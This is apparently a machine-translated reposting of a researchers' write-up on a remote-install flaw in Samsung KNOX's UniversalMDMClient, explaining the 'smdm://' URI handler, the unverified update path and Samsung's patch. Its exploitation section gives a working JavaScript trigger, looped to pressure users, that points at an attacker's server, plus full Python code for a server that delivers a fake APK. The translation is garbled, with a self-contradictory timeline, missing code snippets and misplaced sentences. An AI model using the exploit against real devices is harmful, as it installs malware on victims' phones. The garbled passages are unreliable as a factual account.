In-depth analysis: Samsung Galaxy KNOX Remote Code Execution Vulnerability

In-depth analysis: Samsung Galaxy KNOX Remote Code Execution Vulnerability

This article details the latest Remote Execution Vulnerability Detected by Samsung Galaxy S5. Attackers can exploit this vulnerability to intrude into the system. Currently, Samsung has fixed this vulnerability in Galaxy S5, Note 4, and Alpha, but it has not been fixed on S4, S4 Mini, Note3, and Ace 4 (possibly with other devices.

Introduction

KNOX is a security solution developed by Samsung based on the open-source Android platform. It comprehensively enhances security by combining physical and software systems.

Our Quarkslab team prefers Android devices. So when Samsung Galaxy S5 was released, we checked its firmware. Soon we discovered a simple vulnerability and an available exp (vulnerability exploitation ). The program with the vulnerability is UniversalMDMApplication. This program is included in the S5 ROM by default and is part of the Samsung KNOX security solution.

By exploiting this vulnerability, We can mistake programs with vulnerabilities into new updates. The result is that the application will pop up a window asking users if they need to update. If the user selects "yes", the malware will be installed. If the user selects "no", we can pop up a window again to make the user mistakenly think that "no" is invalid. Our vulnerabilities can be implemented by email (allowing users to click a link), or they can be triggered when users use Chrome/their own browser to browse webpages. Alternatively, attackers can inject JavaScript into HTML pages during MITM attacks.

We have never announced this vulnerability because we intend to announce it in the mobile pwn2own competition, but it seems that this year's rules are stricter. In the new rule, the victim can only perform one click operation. So when the pop-up window appears, although most users click "yes", this is a foul for the Pwn2Own competition.

Even if there is no "user interaction" problem, this vulnerability was fixed on Samsung Note 4 and Alpha in August this year, but it was not fixed on Galaxy S5 until October, therefore, this vulnerability cannot be used for pwn2own.

This article describes how a vulnerability works, reminds developers to pay attention to such vulnerabilities, and describes how to exploit them.

Timeline

 

July-Samsung Galaxy S5 was released. We found the vulnerabilities released on July 4-Samsung Galaxy Note 4 and Alpha. Vulnerabilities in the ROM of these two models were fixed in April October 2014-vulnerabilities on Samsung S5 were fixed in April November 2014-Mobile Pwn2Own Competition

As far as we know, vulnerabilities in the following models have not been fixed:

Samsung Galaxy S4 (ROM version: I9505XXUGNH8) Samsung Galaxy S4 mini (ROM version: i9425ubucng1) Samsung Galaxy Note 3 (ROM version: N9005XXUGNG1) Samsung Galaxy Ace 4 (ROM version: G357FZXXU1ANHD)

Warning All devices are not listed in this list, and other devices may have vulnerabilities. You can fix the vulnerability at the end of the article.

Vulnerability Analysis

Brief writeup

The UniversalMDMClient application is installed with the Samsung KNOX component by default. It registers a URI :"Smdm ://". When you click a link pointing to "smdm: //", the LaunchActivity component in UniversalMDMClient starts and analyzes the URL. It extracts a lot of information from this URL, including updating the server URL.

 

After the URL is extracted to the Update Server, the application uses the HEAD method for the URL. It checks whether the server returns a non-standard header :" X-amz-meta-apk-version". If the server returns this header, it checks the current version of the UniversalMDMClient application and compares it with the version in the "x-amz-meta-apk-version" header. If the version number of the header is updated, a pop-up window is displayed to remind the user of available updates, asking whether the user needs to upgrade.
 

 

If you select "yes", the program will send a GET request like updating the server URL, and the response content will be saved as an APK file. Finally, it will install the application without prompting the user of the permissions required by the application or checking the Program Certificate. Therefore, if attackers can update a user, they can install malware on the user's device.

The program will check whether the downloaded APK package name is the same as that in the UniversalMDMClient application. Because two programs have two different certificates and the package name is the same, you cannot install malicious programs.

Detailed writeup

In the AndroidManifest. xml file of UniversalMDMClient, we can see that it defines URI:
 

manifest android:versionCode="2" android:versionName="1.1.14" package="com.sec.enterprise.knox.cloudmdm.smdms"  xmlns:android="http://schemas.android.com/apk/res/android">   <uses-sdk android:minSdkVersion="17" android:targetSdkVersion="19" />   [...]    <uses-permission android:name="android.permission.INSTALL_PACKAGES" />   [...]    <application android:allowBackup="true" android:name=".core.Core">     <activity android:configChanges="keyboard|keyboardHidden|orientation" android:excludeFromRecents="true"      android:label="@string/titlebar" android:name=".ui.LaunchActivity" android:noHistory="true"      android:theme="@android:style/Theme.DeviceDefault">       <intent-filter>         <data android:scheme="smdm" />         <action android:name="android.intent.action.VIEW" />         <category android:name="android.intent.category.DEFAULT" />         <category android:name="android.intent.category.BROWSABLE" />       </intent-filter>     </activity>   [...]   </application> </manifest> 

 

Intent-filter in rows 11th to 16 registers URI"Smdm ://"And associate itCom. sec. enterprise. knox. cloudmdm. smdms. ui. LaunchActivityComponents. When you try to open a "smdm: //" URI, The onCreate () method in LaunchActivity will process this URL. We will explore the code from here. Apart from program code being "obfuscated" Through proguard, it is not difficult to analyze it using the JEB anti-compiler.

The source code of the onCreate () method is obtained by decompiling:
 

OnCreate () first checks through the getPreETAG () function./Data/com. sec. enterprise. knox. cloudmdm. smdms/shared_prefs/Whether a file exists in the directoryPreETag. xml. If the file exists, the application will call the finish () method to end the execution. By defaultPreETag. xmlThe file does not exist.

Then, the application obtains the Intent to start the Activity or, more accurately, the key value. The format of the key value must be"Smdm: // hostname? Variable 1 = value 1 & Variable 2 = value 2". Variable names can be easily obtained from the source: seg_url, update_url, email, mdm_token, program, and quickstart_url. The most important thing is quickstart_url. After all these variables are written in a shared_preference file, the system calls Core. startSelfUpdateCheck () and onCreate.
 

Core. startSelfUpdateCheck () is used to check whether an update is in progress. If not, UMCSelfUpdateManager. startSelfUpdateCheck () is called ():
 

 

UMCSelfUpdateManager. startSelfUpdateCheck () function checks whether there is a data connection. If there is a pending update, delete it and construct a URL Based on the umc_cdn string value. The umc_cdn string is in the shared_pref file"M. xml", Assign it to a String constant after construction"/Latest". The value of umc_cdn is the key value udpdate_url in Intent. Therefore, this value is completely controlled by attackers. Next, it will call UMCSelfUpdateManager. doUpdateCheck () and treat the previously constructed URL as the first parameter:
 

In this function, ContentTransferManager is initialized and sends head http requests to URLs controlled by attackers. Different request statuses are handled by handleRequestResult class, onFailure (), onProgress (), onStart (), onSucess (), and other methods.
 

Of course, the most interesting method is onSucess. It checks ETag, Content-Length, and x-amz-meta-apk-version in the header. In headerX-amz-meta-apk-versionThe value is compared with the current UniversalMDMApplication APK package version. If the x-amz-meta-apk-version in the header is later than the current APK version, it is determined that it needs to be updated.
 

At this time, the user screen will pop up a window, saying that the application has been updated, ask the user whether to install. If he chooses "yes", we can continue the attack.
 

 

If the user selects "yes", UMCSelfUpdateManager. onSuccess () will be called. It will call the onSucess () method:
 

This onSuccess () will eventually call beginUpdateProcess () to start updating the thread:
 

The update thread will call and execute installApk (), while installApk () will call _ installApplication () to disable package verification (to prevent Google from scanning APK) after installing APK, re-enable package Verification:
 

The entire process ends here. The downloaded APK is neither verified nor displayed to the user. Therefore, this vulnerability can be used by attackers to install malicious programs.
 

 

After the update and installation are complete, the vulnerability cannot be exploited. Because the ETag header value is written to/data after the update is successful/Com. sec. enterprise. knox. cloudmdm. smdms/shared_prefs/PreETag. xmlThe onCreate () method of LaunchActivity first checks whether the file exists.

Samsung patch

To prevent the vulnerability from being exploited, the program checks the package name before installation. The package name must be the same as the package name in UniversalMDMApplication.
The following are the checking functions:
 

Pop-up window in the system that has been patched:

Vulnerability Exploitation

EXP is quite simple. You have to ask your victims to click on your URI, and redirect them through emails or using JavaScript on the webpage:
 

<script>    function trigger(){      document.location="smdm://meow?update_url=http://yourserver/";    }    setTimeout(trigger, 5000);  </script> 

Interestingly, when you use JavaScript to trigger exp, if you select "cancel", Android will return to the webpage and continue executing JavaScript code. This means that we can loop in JavaScript. Users may think that the cancel key in the pop-up window is difficult, and they may click "yes ".

On the server side, you must return the following header:
 

X-amz-meta-apk-version: compile a large number. For example, 1337; ETag: md5 check value of the false APK; Content-Length: APK size

The following is the server code:
 

import hashlib  from BaseHTTPServer import BaseHTTPRequestHandler  APK_FILE = "meow.apk" APK_DATA = open(APK_FILE,"rb").read()  APK_SIZE = str(len(APK_DATA))  APK_HASH = hashlib.md5(APK_DATA).hexdigest()  class MyHandler(BaseHTTPRequestHandler):      def do_GET(self):          self.send_response(200)          self.send_header("Content-Length", APK_SIZE)          self.send_header("ETag", APK_HASH)          self.send_header("x-amz-meta-apk-version", "1337")          self.end_headers()          self.wfile.write(APK_DATA)          return      def do_HEAD(self):          self.send_response(200)          self.send_header("Content-Length", APK_SIZE)          self.send_header("ETag", APK_HASH)          self.send_header("x-amz-meta-apk-version", "1337")          self.end_headers()          return  if __name__ == "__main__":      from BaseHTTPServer import HTTPServer      server = HTTPServer(('0.0.0.0',8080), MyHandler)      server.serve_forever() 

How can I patch myself?
If your device has vulnerabilities, you can wait for the Samsung patch or fix it yourself. You do not need the root permission to fix the patch. You only need to click this link:
Smdm: // patch/

In fact, when you click this link, the vulnerability program will start, but there is no specified update URL, it will use the default Samsung UMC (Universal MDM Client) server http://umc-cdn.secb2b.com: 80, this server has the latest universalmdmclient.apk.

After the installation is complete, you may see this interface. Press the return or Home key.